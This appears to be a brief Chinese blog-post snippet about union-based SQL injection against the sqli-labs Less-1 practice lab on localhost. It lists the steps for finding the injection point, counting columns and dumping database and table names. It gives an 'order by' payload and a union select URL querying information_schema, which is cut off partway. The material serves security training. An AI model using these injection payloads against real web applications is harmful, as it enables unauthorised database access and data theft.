sql----联合注入攻击
1.sqli-less1进行联合注入攻击爆数据
判断注入点:
注入漏洞类型判断:
判断数据库表的字段数 order by 1-99 来判断字段数:?id’ order by 4 --+
判断输出的位置:
爆库名:
爆表名:
http://localhost/sqli/Less-1/?id=0’ union select 1,2, (select group_concat(table_name) from information_schema.tables where table_schem
原创
2020-07-24 18:46:06 ·
198 阅读 ·
0 评论